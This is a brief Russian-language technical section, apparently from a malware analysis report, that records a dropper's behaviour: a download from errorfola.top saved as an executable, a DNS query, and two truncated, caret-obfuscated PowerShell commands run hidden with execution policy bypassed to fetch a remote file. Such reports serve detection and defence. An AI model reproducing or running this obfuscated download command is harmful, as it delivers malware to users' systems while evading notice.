Техническая информация
- http://errorfola.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wershel^L.^EX^e ^-ExecUt^iO^NPo^lIcY^ ^B^Yp^As^s ^-NoP^RO^f^i^Le -^WI^N^D^owStyl^e h^IDdE^N ^(n^Ew-o^bjec^T ^syst^EM^.NeT.^W^EB^CLI^En^T).^d^ow^nlo^Ad^f^Il^E(^'http://errorf...
- DNS ASK er###fola.top
- '<SYSTEM32>\cmd.exe' /c "Po^wershel^L.^EX^e ^-ExecUt^iO^NPo^lIcY^ ^B^Yp^As^s ^-NoP^RO^f^i^Le -^WI^N^D^owStyl^e h^IDdE^N ^(n^Ew-o^bjec^T ^syst^EM^.NeT.^W^EB^CLI^En^T).^d^ow^nlo^Ad^f^Il^E(^'http://errorf...' (со скрытым окном)